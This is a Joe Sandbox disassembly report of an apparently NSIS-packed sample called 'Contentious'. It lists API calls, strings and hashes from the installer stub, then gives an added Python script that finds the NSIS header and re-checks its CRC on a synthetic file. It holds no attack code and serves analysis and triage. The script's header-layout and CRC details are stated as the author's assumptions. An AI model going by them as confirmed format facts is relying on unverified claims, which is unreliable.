                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$`qB$open
                                            • API String ID: 3615053054-3589638645
                                            • Opcode ID: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction ID: 90332823e9378a57a65084aeaf39a46f2e0fe04d3774f3cfafdc0ffa1ca1b148
                                            • Opcode Fuzzy Hash: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction Fuzzy Hash: C87161B1A00209BFDB109F64DD85E6A7B69FB84315F00843AFB05B62D1C778AD51CFA9
                                            APIs
                                            • lstrcpyW.KERNEL32(00425D50,NUL), ref: 00405B47
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405CDB,?,?,00000001,00405853,?,00000000,000000F1,?), ref: 00405B6B
                                            • GetShortPathNameW.KERNEL32(00000000,00425D50,00000400), ref: 00405B74
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            • GetShortPathNameW.KERNEL32(?,00426550,00000400), ref: 00405B91
                                            • wsprintfA.USER32 ref: 00405BAF
                                            • GetFileSize.KERNEL32(00000000,00000000,00426550,C0000000,00000004,00426550,?,?,?,?,?), ref: 00405BEA
                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405BF9
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405C31
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425950,00000000,-0000000A,00409530,00000000,[Rename],00000000,00000000,00000000), ref: 00405C87
                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C99
                                            • GlobalFree.KERNEL32(00000000), ref: 00405CA0
                                            • CloseHandle.KERNEL32(00000000), ref: 00405CA7
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNEL32(00000003,00402DA9,00437800,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                            • String ID: %ls=%ls$NUL$P]B$PeB$[Rename]
                                            • API String ID: 1265525490-1712624446
                                            • Opcode ID: 7ff7a2469f7d5d24e043e3ad287c9395a062c9e6d0063eac934db96454873285
                                            • Instruction ID: b9e722bee1e3d5643c0ee6ce27492db21a7ddaf58c344bd4a326e946b13d45f5
                                            • Opcode Fuzzy Hash: 7ff7a2469f7d5d24e043e3ad287c9395a062c9e6d0063eac934db96454873285
                                            • Instruction Fuzzy Hash: 5F410571A08B15BFE2206B619C49F6B3B5CDF45758F14013ABA01F22D2E63CA9018E7D
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,004281C0,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction ID: 3444b066cc79e46fd946f20d531651005d710df5863fb735ae49ac58aced53cb
                                            • Opcode Fuzzy Hash: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction Fuzzy Hash: 4E418A71804249AFCB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404511
                                            • SetWindowTextW.USER32(00000000,?), ref: 0040453B
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004045EC
                                            • CoTaskMemFree.OLE32(00000000), ref: 004045F7
                                            • lstrcmpiW.KERNEL32(00427160,004226B0,00000000,?,?), ref: 00404629
                                            • lstrcatW.KERNEL32(?,00427160), ref: 00404635
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404647
                                              • Part of subcall function 004055D9: GetDlgItemTextW.USER32(?,?,00000400,0040467E), ref: 004055EC
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406110
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406124
                                              • Part of subcall function 004060AD: CharPrevW.USER32(?,?,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406137
                                            • GetDiskFreeSpaceW.KERNEL32(00420680,?,?,0000040F,?,00420680,00420680,?,00000000,00420680,?,?,000003FB,?), ref: 00404709
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404724
                                              • Part of subcall function 0040487D: lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                              • Part of subcall function 0040487D: wsprintfW.USER32 ref: 00404927
                                              • Part of subcall function 0040487D: SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$`qB
                                            • API String ID: 2624150263-1790975398
                                            • Opcode ID: 1971af5a3371e90a58476a4d9a1bde1db983ec4f734cbdbce4a6dd7cd2fbe865
                                            • Instruction ID: fad5de195099c4bb125bb843149892d88f7ab0b1647696bda0d7f1fd53d0c9ab
                                            • Opcode Fuzzy Hash: 1971af5a3371e90a58476a4d9a1bde1db983ec4f734cbdbce4a6dd7cd2fbe865
                                            • Instruction Fuzzy Hash: 8DA18FB1900208ABDB11AFA5CC45AAF77B8EF85314F10843BF611B62D1D77C9A418B6D
                                            APIs
                                            • GetVersion.KERNEL32(00000000,00421690,?,004050F8,00421690,00000000,00000000,?), ref: 00405EFE
                                            • GetSystemDirectoryW.KERNEL32(00427160,00000400), ref: 00405F7C
                                            • GetWindowsDirectoryW.KERNEL32(00427160,00000400), ref: 00405F8F
                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405FCB
                                            • SHGetPathFromIDListW.SHELL32(?,00427160), ref: 00405FD9
                                            • CoTaskMemFree.OLE32(?), ref: 00405FE4
                                            • lstrcatW.KERNEL32(00427160,\Microsoft\Internet Explorer\Quick Launch), ref: 00406008
                                            • lstrlenW.KERNEL32(00427160,00000000,00421690,?,004050F8,00421690,00000000,00000000,?), ref: 00406062
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$`qB$`qB
                                            • API String ID: 900638850-2919801942
                                            • Opcode ID: ea28a35ba4a8d75ba921609ce9a01e7390a02607404322f79c31b1ab44bd5171
                                            • Instruction ID: 79069b25519764f594e89cf08704c373f390d163d9a81a8315dba2a423a8323b
                                            • Opcode Fuzzy Hash: ea28a35ba4a8d75ba921609ce9a01e7390a02607404322f79c31b1ab44bd5171
                                            • Instruction Fuzzy Hash: A761E271A40506ABDF208F25DC44AAF37A5EF50314F21803BE946BA2D0D73D8A92CF5E
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D7A
                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,00000000,00403455,?), ref: 00402D96
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNEL32(00000003,00402DA9,00437800,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00402DE2
                                            Strings
                                            • soft, xrefs: 00402E57
                                            • h~A, xrefs: 00402DF7
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402F41
                                            • Error launching installer, xrefs: 00402DB9
                                            • Inst, xrefs: 00402E4E
                                            • Null, xrefs: 00402E60
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$h~A$soft
                                            • API String ID: 4283519449-667434385
                                            • Opcode ID: 72d10519aa7813a22122ce2a190531e2113159e5969d5fc00564573f2f7bee58
                                            • Instruction ID: 9f10899fc39ddd59763a437958ebfb3d319deb30ea47bf766ee46431d43f5b69
                                            • Opcode Fuzzy Hash: 72d10519aa7813a22122ce2a190531e2113159e5969d5fc00564573f2f7bee58
                                            • Instruction Fuzzy Hash: 3E51F871940215ABDB209F65DE89BAF7AB4EB44358F14403BF904F62D1C7B88D818BAD
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00403003
                                            • GetTickCount.KERNEL32 ref: 00403084
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                            • wsprintfW.USER32 ref: 004030C4
                                            • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 004030F3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 4209647438-2449383134
                                            • Opcode ID: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction ID: cf63611a73504a8a14adbad67728b55c0939cb45f31c124ce58839b51082c780
                                            • Opcode Fuzzy Hash: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction Fuzzy Hash: AE517F3190021AABCF10DF65D944A9F7BACEF08756F10413BE911BB2C1D7389E51CBA9
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004040AB
                                            • GetSysColor.USER32(00000000), ref: 004040C7
                                            • SetTextColor.GDI32(?,00000000), ref: 004040D3
                                            • SetBkMode.GDI32(?,?), ref: 004040DF
                                            • GetSysColor.USER32(?), ref: 004040F2
                                            • SetBkColor.GDI32(?,?), ref: 00404102
                                            • DeleteObject.GDI32(?), ref: 0040411C
                                            • CreateBrushIndirect.GDI32(?), ref: 00404126
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction ID: c86db10b712075dc0fdd11195a27afd72c2c4955ef31593f119c7b4a1354f6c1
                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction Fuzzy Hash: 012196B1904744ABCB319F68DD08B4BBBF8AF40714F048629E991F66E0C738E944CB65
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                            • GlobalFree.KERNEL32(00000000), ref: 00402877
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 343dad6e1d1f1acc39dc54fd2dbddba37a0f4f359c67a42cb200f436d1195532
                                            • Instruction ID: 0a6bca8ecd63676026edbfb1c3c3c77fca9f2a16f8acb5fc7edd4aca8780f57a
                                            • Opcode Fuzzy Hash: 343dad6e1d1f1acc39dc54fd2dbddba37a0f4f359c67a42cb200f436d1195532
                                            • Instruction Fuzzy Hash: F231C471C00118BBDF11AFA5CE49DAF7E79EF08364F24423AF910762D1C6795E418BA9
                                            APIs
                                            • lstrlenW.KERNEL32(00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                            • lstrlenW.KERNEL32(004030DB,00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                            • lstrcatW.KERNEL32(00421690,004030DB), ref: 0040511C
                                            • SetWindowTextW.USER32(00421690,00421690), ref: 0040512E
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 8122bcf6a0149e6086bbb6e7fb337fef40a49940aa05a85ef971a36efe7fc915
                                            • Instruction ID: a155edcc61f39e61e19764dfe73df8d96dc604efb0d9904bed2a7f1a8b5b6fb0
                                            • Opcode Fuzzy Hash: 8122bcf6a0149e6086bbb6e7fb337fef40a49940aa05a85ef971a36efe7fc915
                                            • Instruction Fuzzy Hash: 96217C71D00558BBCB219FA5DD45ADFBFB9EF44350F10806AF944A62A0C6794A418F98
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004049A6
                                            • GetMessagePos.USER32 ref: 004049AE
                                            • ScreenToClient.USER32(?,?), ref: 004049C8
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004049DA
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404A00
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction ID: 33ec571dbc4b5df47611d51f67fe054ec100feaa4e66978c3360ecba7af0637a
                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction Fuzzy Hash: F9015271D00219BADB00DBA5DD45FFFBBBCAB54711F10416BBB10B61D0C7B4A6018B95
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC8
                                            • wsprintfW.USER32 ref: 00402CD8
                                            • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402CD2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction ID: 24f1e3b0c7db3a4d5467dde3e45a6c68f3834aeb0eb2857db4594cab4802523f
                                            • Opcode Fuzzy Hash: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction Fuzzy Hash: 3C014471644248BFEF24AF60DD49BEE3B69FB00305F008439FA06A52D0DBB89954DF59
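The function at 00402D7A above opens the running executable (GetModuleFileNameW, CreateFileW, GetFileSize) and looks for the NSIS first header; the fragments "Null", "soft" and "Inst" in its string list are the three DWORDs of the "NullsoftInst" signature. The function at 00402C9D drives the progress text "verifying installer: %d%%" while the stub runs its CRC pass, and a mismatch yields the "Installer integrity check has failed" message seen at 00402F41. The Python below is an added triage example, not code from the Joe Sandbox report, from NSIS or from the sample: it reproduces that header lookup and integrity check on a file so an analyst can confirm an NSIS wrapper and find where the embedded installer data begins and ends. The field layout, the meaning of length_of_all_following_data and the placement of the trailing CRC follow my reading of the NSIS exehead and makensis sources and should be treated as assumptions; build_sample() constructs a synthetic NSIS-shaped file so the code runs offline.

```python
import struct
import zlib

# NSIS "firstheader" record (layout taken from the NSIS exehead sources, fileform.h):
#   int flags; int siginfo; int nsinst[3]; int length_of_header;
#   int length_of_all_following_data;
# siginfo is 0xDEADBEEF and nsinst[] holds the ASCII "NullsoftInst" as three
# little-endian DWORDs ("Null", "soft", "Inst"), which is why those fragments
# appear as separate strings in the disassembly listing.
FIRSTHEADER = struct.Struct("<7I")
NSIS_SIGNATURE = struct.pack("<I", 0xDEADBEEF) + b"NullsoftInst"

FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8


def find_nsis_firstheader(data: bytes):
    """Locate and decode the first NSIS firstheader in an image.

    Returns a dict with the record offset and fields, or None when the
    signature is absent (i.e. this is not an NSIS-built executable)."""
    pos = data.find(NSIS_SIGNATURE)
    while pos != -1:
        start = pos - 4  # siginfo is the second DWORD; flags precede it
        if start >= 0 and start + FIRSTHEADER.size <= len(data):
            flags, _sig, _n1, _n2, _n3, hdr_len, all_len = FIRSTHEADER.unpack_from(data, start)
            return {
                "offset": start,
                "flags": flags,
                "length_of_header": hdr_len,
                "length_of_all_following_data": all_len,
                # Assumption (from makensis build.cpp): the length is counted from
                # the firstheader itself, so this is where the installer ends.
                "end": start + all_len,
            }
        pos = data.find(NSIS_SIGNATURE, pos + 1)
    return None


def nsis_crc_ok(data: bytes, fh: dict):
    """Re-run the stub's integrity check.

    Assumption (from exehead/main.c): unless FH_FLAGS_NO_CRC is set, the last
    DWORD of the installer is a CRC32 over every byte before it, counted from
    the start of the file.  Returns True/False, or None when the installer was
    built without a CRC."""
    if fh["flags"] & FH_FLAGS_NO_CRC:
        return None
    end = fh["end"]
    if end > len(data) or end - 4 < fh["offset"]:
        return False  # truncated file: the "incomplete download" case the message names
    stored = struct.unpack_from("<I", data, end - 4)[0]
    computed = zlib.crc32(data[: end - 4]) & 0xFFFFFFFF
    return stored == computed


def build_sample(stub_size=0x400, payload=b"\x00" * 64, with_crc=True, corrupt=False):
    """Construct a minimal NSIS-shaped file for offline testing (not a real installer)."""
    stub = b"MZ" + b"\x90" * (stub_size - 2)          # stand-in for the PE stub
    hdr_len = 0x20                                     # stand-in compressed header
    all_len = FIRSTHEADER.size + hdr_len + len(payload) + (4 if with_crc else 0)
    flags = 0 if with_crc else FH_FLAGS_NO_CRC
    fh = FIRSTHEADER.pack(flags, 0xDEADBEEF, 0x6C6C754E, 0x74666F73, 0x74736E49,
                          hdr_len, all_len)
    body = stub + fh + b"H" * hdr_len + payload
    if with_crc:
        crc = zlib.crc32(body) & 0xFFFFFFFF
        if corrupt:
            crc ^= 1  # flip one bit so the check fails, as with a damaged download
        body += struct.pack("<I", crc)
    return body


if __name__ == "__main__":
    sample = build_sample()
    hdr = find_nsis_firstheader(sample)
    print("firstheader at 0x%x, flags=%d, data ends at 0x%x, crc ok=%s"
          % (hdr["offset"], hdr["flags"], hdr["end"], nsis_crc_ok(sample, hdr)))
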